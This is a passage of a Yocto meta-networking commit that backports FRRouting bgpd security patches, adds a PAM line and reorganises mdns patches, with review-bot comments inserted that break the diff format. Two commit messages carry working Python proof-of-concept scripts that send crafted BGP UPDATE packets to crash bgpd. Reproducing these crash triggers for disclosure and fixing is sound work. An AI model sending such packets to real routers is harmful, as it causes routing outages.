b/bgpd/bgp_packet.c +index 2fd28aae3..261695198 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1843,8 +1843,7 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + * Non-MP IPv4/Unicast EoR is a completely empty UPDATE + * and MP EoR should have only an empty MP_UNREACH + */ +- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) +- || 
(attr_parse_ret == BGP_ATTR_PARSE_EOR)) { ++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { + afi_t afi = 0; + safi_t safi; + struct graceful_restart_info *gr_info; +@@ -1865,9 +1864,6 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + && nlris[NLRI_MP_WITHDRAW].length == 0) { + afi = nlris[NLRI_MP_WITHDRAW].afi; + safi = nlris[NLRI_MP_WITHDRAW].safi; +- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { +- afi = nlris[NLRI_MP_UPDATE].afi; +- safi = nlris[NLRI_MP_UPDATE].safi; + } + + if (afi && peer->afc[afi][safi]) { +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch new file mode 100644 index 0000000000..855eb190db --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch 
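Review bot: The new `return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0);` in bgp_mp_reach_parse passes 0 as the last argument, while the other bgp_attr_malformed calls in bgp_attr.c shown on this page pass `args->total`. If that argument is the length of attribute data attached to the NOTIFICATION, a zero means the peer gets none of the offending bytes back; either pass `args->total` or add a comment on that line stating why no data is sent. Removing `BGP_ATTR_PARSE_EOR` from bgp_attr.h also changes the enum for anything else that includes the header, which deserves a line in the patch description.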
@@ -0,0 +1,119 @@ +From 60bd794a9cf6df05503a062e113161dcbdbfac9d Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:22:22 +0000 +Subject: [PATCH 4/6] bgpd: Check mandatory attributes more carefully for + UPDATE message + +If we send a crafted BGP UPDATE message without mandatory attributes, we do +not check if the length of the path attributes is zero or not. We only check +if attr->flag is at least set or not. Imagine we send only unknown transit +attribute, then attr->flag is always 0. Also, this is true only if graceful-restart +capability is received. + +A crash: + +``` +bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) +bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 +BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] +BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] +BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] +BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] +BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] +BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] +BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] +BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] +BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] +BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] +BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] +BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] +BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] +``` + +Sending: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(1000) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-46753 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 10 ++++++---- + 1 file changed, 6 insertions(+), 4 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index e0542356c..35122943e 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3044,13 +3044,15 @@ static bgp_attr_parse_ret_t bgp_attr_unknown(struct bgp_attr_parser_args *args) + } + + /* Well-known attribute check. */ +-static int bgp_attr_check(struct peer *peer, struct attr *attr) ++static int bgp_attr_check(struct peer *peer, struct attr *attr, ++ bgp_size_t length) + { + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an + * empty UPDATE. 
*/ +- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) ++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && ++ !length) + return BGP_ATTR_PARSE_PROCEED; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +@@ -3101,7 +3103,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + bgp_attr_parse_ret_t ret; + uint8_t flag = 0; + uint8_t type = 0; +- bgp_size_t length; ++ bgp_size_t length = 0; + uint8_t *startp, *endp; + uint8_t *attr_endp; + uint8_t seen[BGP_ATTR_BITMAP_SIZE]; +@@ -3416,7 +3418,7 @@ bgp_attr_parse_ret_t bgp_attr_parse(struct peer *peer, struct attr *attr, + } + + /* Check all mandatory well-known attributes are present */ +- ret = bgp_attr_check(peer, attr); ++ ret = bgp_attr_check(peer, attr, length); + if (ret < 0) + goto done; + +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch new file mode 100644 index 0000000000..9bf63372a4 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch 
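Review bot: The `length` passed to `bgp_attr_check()` looks like the per-attribute local of `bgp_attr_parse()` (it is declared beside `flag` and `type` and is now initialised to 0), whereas the commit message speaks of the length of the path attributes as a whole. If so, `!length` holds when no attribute was parsed or when the last one parsed had zero length, which is a different condition from "the UPDATE carried no path attributes". The parse loop lies outside the hunk, so this is inferred. A comment on the new parameter would pin the intent, for example `/* length: length of the last attribute parsed, 0 if none was parsed */`.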
@@ -0,0 +1,98 @@ +From 682f100cd8d1bf7510939faa033f69ce64f965e9 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:32:38 +0000 +Subject: [PATCH 5/6] bgpd: Ignore handling NLRIs if we received + MP_UNREACH_NLRI + +If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if +no mandatory path attributes received. + +In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled +as a new data, but without mandatory attributes, it's a malformed packet. + +In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST +handle that. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-47234 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 19 ++++++++++--------- + bgpd/bgp_attr.h | 1 + + bgpd/bgp_packet.c | 7 ++++++- + 3 files changed, 17 insertions(+), 10 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 35122943e..13da27e99 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3055,15 +3055,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + !length) + return BGP_ATTR_PARSE_PROCEED; + +- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +- are present, it should. Check for any other attribute being present +- instead. 
+- */ +- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && +- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) +- return BGP_ATTR_PARSE_PROCEED; +- + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; + +@@ -3082,6 +3073,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) + type = BGP_ATTR_LOCAL_PREF; + ++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required ++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI ++ * are present, it should. Check for any other attribute being present ++ * instead. ++ */ ++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && ++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) ++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY ++ : BGP_ATTR_PARSE_PROCEED; ++ + /* If any of the well-known mandatory attributes are not present + * in an UPDATE message, then "treat-as-withdraw" MUST be used. + */ +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 69f962134..77640dd5b 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -378,6 +378,7 @@ typedef enum { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, ++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4, + } bgp_attr_parse_ret_t; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 261695198..c1c28f344 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1767,7 +1767,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len && attribute_len) { ++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then ++ * NLRIs should be handled as a new data. Though, if we received ++ * NLRIs without mandatory attributes, they should be ignored. 
++ */ ++ if (update_len && attribute_len && ++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch new file mode 100644 index 0000000000..218dcba510 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch 
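Review bot: The new `BGP_ATTR_PARSE_MISSING_MANDATORY` return leaves `bgp_attr_check()` before the treat-as-withdraw code that follows it, and the only consumer shown, the `update_len && attribute_len` test in `bgp_update_receive()`, then skips the NLRIs without a log line. An operator would have no record that a peer sent NLRIs without mandatory attributes. A warning when the test fails for that reason would make it visible, along the lines of `flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, "%s: NLRIs ignored, mandatory attributes missing", peer->host);`. Both functions continue outside their hunks, so an existing log further down cannot be ruled out. The new enum entry also lacks the kind of comment its neighbour `BGP_ATTR_PARSE_ERROR_NOTIFYPLS` carries.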
@@ -0,0 +1,114 @@ +From 024bdfcdf1d52db3a74f00a3370c3834a4bb78d0 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 20 Nov 2023 14:39:33 +0000 +Subject: [PATCH 6/6] bgpd: Treat EOR as withdrawn to avoid unwanted handling + of malformed attrs + +Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be +processed as a normal UPDATE without mandatory attributes, that could lead +to harmful behavior. In this case, a crash for route-maps with the configuration +such as: + +``` +router bgp 65001 + no bgp ebgp-requires-policy + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + ! + address-family ipv4 unicast + neighbor 127.0.0.1 addpath-tx-all-paths + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +exit +! 
+route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Send a malformed optional transitive attribute: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(100) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-47235 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_attr.c | 15 ++++++++++++--- + 1 file changed, 12 insertions(+), 3 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 13da27e99..1e08a218e 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3050,10 +3050,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an +- * empty UPDATE. */ ++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, ++ * we will pass it to be processed as a normal UPDATE without mandatory ++ * attributes, that could lead to harmful behavior. 
++ */ + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && + !length) +- return BGP_ATTR_PARSE_PROCEED; ++ return BGP_ATTR_PARSE_WITHDRAW; + + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; +@@ -3477,7 +3480,13 @@ done: + } + + transit = bgp_attr_get_transit(attr); +- if (ret != BGP_ATTR_PARSE_ERROR) { ++ /* If we received an UPDATE with mandatory attributes, then ++ * the unrecognized transitive optional attribute of that ++ * path MUST be passed. Otherwise, it's an error, and from ++ * security perspective it might be very harmful if we continue ++ * here with the unrecognized attributes. ++ */ ++ if (ret == BGP_ATTR_PARSE_PROCEED) { + /* Finally intern unknown attribute. */ + if (transit) + bgp_attr_set_transit(attr, transit_intern(transit)); +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/frr.pam b/meta-networking/recipes-protocols/frr/frr/frr.pam index 3541a975ae..a9ec35dd69 100644 --- a/meta-networking/recipes-protocols/frr/frr/frr.pam +++ b/meta-networking/recipes-protocols/frr/frr/frr.pam @@ -1,10 +1,11 @@ # -# The PAM configuration file for the quagga `vtysh' service +# The PAM configuration file for the frr `vtysh' service # # This allows root to change user infomation without being # prompted for a password auth sufficient pam_rootok.so +account sufficient pam_rootok.so # The standard Unix authentication modules, used with # NIS (man nsswitch) as well as normal /etc/passwd and diff --git a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb index 658731567d..03b106131f 100644 --- a/meta-networking/recipes-protocols/frr/frr_8.2.2.bb +++ b/meta-networking/recipes-protocols/frr/frr_8.2.2.bb 
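Review bot: Changing the guard in the `done:` block from `ret != BGP_ATTR_PARSE_ERROR` to `ret == BGP_ATTR_PARSE_PROCEED` also sends `BGP_ATTR_PARSE_WITHDRAW` and `BGP_ATTR_PARSE_MISSING_MANDATORY` results down the other path, which the added comment does not say. The comment speaks only of unrecognized transitive attributes, but the `if` body continues outside the hunk, so anything else it interns is now skipped for those results too. The alternative branch, if there is one, should be checked to release `transit` and the rest. I would state the contract directly: `/* Intern only on PROCEED; WITHDRAW, MISSING_MANDATORY and ERROR take the cleanup path. */`.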
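Review bot: The added `account sufficient pam_rootok.so` line has no comment, and the header above it ("This allows root to change user infomation without being prompted for a password") describes only the `auth` line. With `sufficient`, a root caller of the vtysh service skips every account-management module listed after it, so expiry or access restrictions configured there no longer apply to root. Suggested comment above the new line: `# root also bypasses the account checks below (expiry, access rules)`. The rest of the file is outside the hunk, so which account modules follow is not visible.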
@@ -12,6 +12,21 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/8.2 \ file://CVE-2022-37035.patch \ file://CVE-2022-37032.patch \ + file://CVE-2022-42917.patch \ + file://CVE-2022-36440.patch \ + file://CVE-2022-40318.patch \ + file://CVE-2022-43681.patch \ + file://CVE-2023-31489.patch \ + file://CVE-2023-31490.patch \ + file://CVE-2023-38802.patch \ + file://CVE-2023-41358.patch \ + file://CVE-2023-41909.patch \ + file://CVE-2023-38406.patch \ + file://CVE-2023-38407.patch \ + file://CVE-2023-46752.patch \ + file://CVE-2023-46753.patch \ + file://CVE-2023-47234.patch \ + file://CVE-2023-47235.patch \ file://frr.pam \ " diff --git a/meta-networking/recipes-protocols/mdns/files/0001-Create-subroutine-for-cleaning-recent-interfaces.patch b/meta-networking/recipes-protocols/mdns/mdns/0001-Create-subroutine-for-cleaning-recent-interfaces.patch index f8efc10448..f8efc10448 100644 --- a/meta-networking/recipes-protocols/mdns/files/0001-Create-subroutine-for-cleaning-recent-interfaces.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0001-Create-subroutine-for-cleaning-recent-interfaces.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0001-dns-sd-Include-missing-headers.patch b/meta-networking/recipes-protocols/mdns/mdns/0001-dns-sd-Include-missing-headers.patch index c743b3eddb..c743b3eddb 100644 --- a/meta-networking/recipes-protocols/mdns/files/0001-dns-sd-Include-missing-headers.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0001-dns-sd-Include-missing-headers.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0001-mdns-include-stddef.h-for-NULL.patch b/meta-networking/recipes-protocols/mdns/mdns/0001-mdns-include-stddef.h-for-NULL.patch index c57ce8fa53..c57ce8fa53 100644 --- a/meta-networking/recipes-protocols/mdns/files/0001-mdns-include-stddef.h-for-NULL.patch 
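Review bot: Nothing in the recipe records that the `CVE-2023-46752`, `CVE-2023-46753`, `CVE-2023-47234` and `CVE-2023-47235` entries depend on their order. Their `bgpd/bgp_attr.c` index lines chain (`b10a60351..e0542356c`, `e0542356c..35122943e`, `35122943e..13da27e99`, `13da27e99..1e08a218e`), and the third patch reuses the enum value -4 that the first one frees. Reordering or dropping one would at best fail to apply. A comment above `SRC_URI` would protect later edits, such as `# CVE-2023-46752/46753/47234/47235 form a series against bgpd; keep all four, in this order`.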
+++ b/meta-networking/recipes-protocols/mdns/mdns/0001-mdns-include-stddef.h-for-NULL.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0002-Create-subroutine-for-tearing-down-an-interface.patch b/meta-networking/recipes-protocols/mdns/mdns/0002-Create-subroutine-for-tearing-down-an-interface.patch index 21ba318499..21ba318499 100644 --- a/meta-networking/recipes-protocols/mdns/files/0002-Create-subroutine-for-tearing-down-an-interface.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0002-Create-subroutine-for-tearing-down-an-interface.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0002-mdns-cross-compilation-fixes-for-bitbake.patch b/meta-networking/recipes-protocols/mdns/mdns/0002-mdns-cross-compilation-fixes-for-bitbake.patch index 33590ffc57..33590ffc57 100644 --- a/meta-networking/recipes-protocols/mdns/files/0002-mdns-cross-compilation-fixes-for-bitbake.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0002-mdns-cross-compilation-fixes-for-bitbake.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0003-Track-interface-socket-family.patch b/meta-networking/recipes-protocols/mdns/mdns/0003-Track-interface-socket-family.patch index 8c0e6bf397..8c0e6bf397 100644 --- a/meta-networking/recipes-protocols/mdns/files/0003-Track-interface-socket-family.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0003-Track-interface-socket-family.patch diff --git a/meta-networking/recipes-protocols/mdns/files/0004-Use-list-for-changed-interfaces.patch b/meta-networking/recipes-protocols/mdns/mdns/0004-Use-list-for-changed-interfaces.patch index db3a63ea48..db3a63ea48 100644 --- a/meta-networking/recipes-protocols/mdns/files/0004-Use-list-for-changed-interfaces.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0004-Use-list-for-changed-interfaces.patch 
diff --git a/meta-networking/recipes-protocols/mdns/files/0006-Remove-unneeded-function.patch b/meta-networking/recipes-protocols/mdns/mdns/0006-Remove-unneeded-function.patch index b461a60df7..b461a60df7 100644 --- a/meta-networking/recipes-protocols/mdns/files/0006-Remove-unneeded-function.patch +++ b/meta-networking/recipes-protocols/mdns/mdns/0006-Remove-unneeded-function.patch diff --git a/meta-networking/recipes-protocols/mdns/mdns/0006-make-Add-top-level-Makefile.patch b/meta-networking/recipes-protocols/mdns/mdns/0006-make-Add-top-level-Makefile.patch new file mode 100644 index 0000000000..b7d9ad5bba --- /dev/null +++ b/meta-networking/recipes-protocols/mdns/mdns/0006-make-Add-top-level-Makefile.patch 
@@ -0,0 +1,175 @@ +From 177abf68e5ac5f82c6261af63528f8b6160bca0f Mon Sep 17 00:00:00 2001 +From: Alex Kiernan <alex.kiernan@gmail.com> +Date: Tue, 6 Dec 2022 13:28:31 +0000 +Subject: [PATCH] make: Add top-level Makefile + +Simple top level Makefile that just delegates to mDNSPosix. + +Upstream-Status: Inappropriate [oe-specific] +Signed-off-by: Alex Kiernan <alex.kiernan@gmail.com> +--- + Makefile | 154 +------------------------------------------------------ + 1 file changed, 2 insertions(+), 152 deletions(-) + +diff --git a/Makefile b/Makefile +index 8b6fa77..feb6ac6 100644 +--- a/Makefile ++++ b/Makefile +@@ -1,152 +1,2 @@ +-# +-# Copyright (c) 2003-2018 Apple Inc. All rights reserved. +-# +-# Top level makefile for Build & Integration (B&I). +-# +-# This file is used to facilitate checking the mDNSResponder project directly from git and submitting to B&I at Apple. +-# +-# The various platform directories contain makefiles or projects specific to that platform. +-# +-# B&I builds must respect the following target: +-# install: +-# installsrc: +-# installhdrs: +-# installapi: +-# clean: +-# +- +-include $(MAKEFILEPATH)/pb_makefiles/platform.make +- +-MVERS = "mDNSResponder-1310.140.1" +- +-VER = +-ifneq ($(strip $(GCC_VERSION)),) +- VER = -- GCC_VERSION=$(GCC_VERSION) +-endif +-echo "VER = $(VER)" +- +-projectdir := $(SRCROOT)/mDNSMacOSX +-buildsettings := OBJROOT=$(OBJROOT) SYMROOT=$(SYMROOT) DSTROOT=$(DSTROOT) MVERS=$(MVERS) SDKROOT=$(SDKROOT) +- +-.PHONY: install installSome installEmpty installExtras SystemLibraries installhdrs installapi installsrc java clean +- +-# Sanitizer support +-# Disable Sanitizer instrumentation in LibSystem contributors. See rdar://problem/29952210. 
+-UNSUPPORTED_SANITIZER_PROJECTS := mDNSResponderSystemLibraries mDNSResponderSystemLibraries_Sim +-PROJECT_SUPPORTS_SANITIZERS := 1 +-ifneq ($(words $(filter $(UNSUPPORTED_SANITIZER_PROJECTS), $(RC_ProjectName))), 0) +- PROJECT_SUPPORTS_SANITIZERS := 0 +-endif +-ifeq ($(RC_ENABLE_ADDRESS_SANITIZATION),1) +- ifeq ($(PROJECT_SUPPORTS_SANITIZERS),1) +- $(info Enabling Address Sanitizer) +- buildsettings += -enableAddressSanitizer YES +- else +- $(warning WARNING: Address Sanitizer not supported for project $(RC_ProjectName)) +- endif +-endif +-ifeq ($(RC_ENABLE_THREAD_SANITIZATION),1) +- ifeq ($(PROJECT_SUPPORTS_SANITIZERS),1) +- $(info Enabling Thread Sanitizer) +- buildsettings += -enableThreadSanitizer YES +- else +- $(warning WARNING: Thread Sanitizer not supported for project $(RC_ProjectName)) +- endif +-endif +-ifeq ($(RC_ENABLE_UNDEFINED_BEHAVIOR_SANITIZATION),1) +- ifeq ($(PROJECT_SUPPORTS_SANITIZERS),1) +- $(info Enabling Undefined Behavior Sanitizer) +- buildsettings += -enableUndefinedBehaviorSanitizer YES +- else +- $(warning WARNING: Undefined Behavior Sanitizer not supported for project $(RC_ProjectName)) +- endif +-endif +- +-# B&I install build targets +-# +-# For the mDNSResponder build alias, the make target used by B&I depends on the platform: +-# +-# Platform Make Target +-# -------- ----------- +-# osx install +-# ios installSome +-# atv installSome +-# watch installSome +-# +-# For the mDNSResponderSystemLibraries and mDNSResponderSystemLibraries_sim build aliases, B&I uses the SystemLibraries +-# target for all platforms. 
+- +-install: +-ifeq ($(RC_ProjectName), mDNSResponderServices) +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Services-macOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Services' $(VER) +-endif +-else ifeq ($(RC_ProjectName), mDNSResponderServices_Sim) +- mkdir -p $(DSTROOT)/AppleInternal +-else +- cd '$(projectdir)'; xcodebuild install $(buildsettings) $(VER) +-endif +- +-installSome: +- cd '$(projectdir)'; xcodebuild install $(buildsettings) $(VER) +- +-installEmpty: +- mkdir -p $(DSTROOT)/AppleInternal +- +-installExtras: +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras-macOS' $(VER) +-else ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), ios) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras-iOS' $(VER) +-else ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), atv) +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras-tvOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target 'Build Extras' $(VER) +-endif +- +-SystemLibraries: +- cd '$(projectdir)'; xcodebuild install $(buildsettings) -target SystemLibraries $(VER) +- +-# B&I installhdrs build targets +- +-installhdrs:: +-ifeq ($(RC_ProjectName), mDNSResponderServices) +-ifeq ($(RC_PROJECT_COMPILATION_PLATFORM), osx) +- cd '$(projectdir)'; xcodebuild installhdrs $(buildsettings) -target 'Build Services-macOS' $(VER) +-else +- cd '$(projectdir)'; xcodebuild installhdrs $(buildsettings) -target 'Build Services' $(VER) +-endif +-else ifeq ($(RC_ProjectName), mDNSResponderServices_Sim) +- mkdir -p $(DSTROOT)/AppleInternal +-else ifneq ($(findstring SystemLibraries,$(RC_ProjectName)),) +- cd '$(projectdir)'; xcodebuild installhdrs $(buildsettings) -target SystemLibraries $(VER) +-endif +- +-# B&I 